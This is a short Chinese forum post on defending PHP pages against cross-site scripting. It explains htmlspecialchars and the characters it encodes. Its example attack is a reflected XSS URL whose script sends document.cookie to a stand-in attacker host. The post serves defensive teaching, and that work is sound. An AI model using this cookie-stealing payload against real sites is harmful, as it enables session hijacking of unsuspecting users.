当存在跨站漏洞的程序出现应该怎么做

会爱人呢
39012会爱人呢安全工作者
2016-12-06 16:47:38
39012 2016-12-06 16:47:38
当有存在跨站漏洞的程序出现的时候,攻击者可以构造类似
https://www.sectop.com/search.php?key=<script>document.location='https://www.hack.com/getcoo
kie.php?cookie='+document.cookie;</script>,诱骗用户点击后,可以获取用户cookies值
防范方法:
利用htmlspecialchars函数将特殊字符转换成HTML编码
函数原型
stringhtmlspecialchars(stringstring,intquote_style,stringcharset)
string是要编码的字符串
quote_style可选,值可为ENT_COMPAT、ENT_QUOTES、ENT_NOQUOTES,默认值
ENT_COMPAT,表示只转换双引号不转换单引号。ENT_QUOTES,表示双引号和单引号都
要转换。ENT_NOQUOTES,表示双引号和单引号都不转换
charset可选,表示使用的字符集
函数会将下列特殊字符转换成html编码:
&---->&amp;
"---->&quot;
'---->&#039;
<---->&lt;
>---->&gt;
本文标题:当存在跨站漏洞的程序出现应该怎么做
本文作者:会爱人呢
本文来自:蚁安黑客官网
转载请注明本文链接:http://bbs.mayidui.net/t105.html
raoday
沙发raoday安全工作者 2016-12-06 17:37
大神教我
会爱人呢
板凳会爱人呢安全工作者 2016-12-06 20:48
raoday:大神教我回到原帖
求我
游客
登录黑客论坛后才可以回帖,黑客登录 或者 注册黑客
weixin
蚁安黑客

找黑客工具、找黑客教程、找黑客朋友,你想不到的黑客技术这儿都有!

微信号:baiyiwangan